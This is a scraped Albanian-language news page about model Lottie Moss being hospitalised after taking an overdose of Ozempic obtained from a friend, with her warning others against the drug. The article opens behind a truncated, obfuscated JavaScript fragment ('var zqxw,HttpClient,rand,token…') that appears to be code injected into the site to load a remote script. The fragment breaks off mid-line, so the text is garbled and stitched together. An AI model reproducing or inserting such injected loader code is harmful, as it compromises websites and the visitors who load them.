;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Mbidozë e ‘Ozempic’, motra e Kate Moss përfundon në spital!

By

Modelja Lottie Moss, motra e supermodeles Kate Moss, përfundoi në spital pasi mori një mbidozë të Ozempic, një ilaç i destinuar për diabetikët që shumë njerëz e përdorin për të humbur peshë.

Lottie e mori Ozempic-un nga një shoqe dhe tani thotë se më përpara do të “preferonte të vdiste” sesa ta përdorte përsëri. Pas dy javësh përdorimi të një doze të madhe të Ozempic, Lottie pësoi një krizë për shkak të dehidratimit të rëndë.

Pas ekzaminimeve nga mjekët, Lottie mësoi se doza e Ozempic-ut që ajo e injektonte në këmbë duhet të përshkruhej për dikë që peshon të paktën 100 kilogramë, ndërsa ajo peshonte rreth 50 kilogramë.

”E injektoja në këmbë dhe ishte vendimi më i keq që kam marrë. Ky është një paralajmërim për të gjithë. Ju lutem, nëse mendoni ta merrni, mos e bëni, nuk ia vlen”, tha ajo.

Artikuj të ngjashëm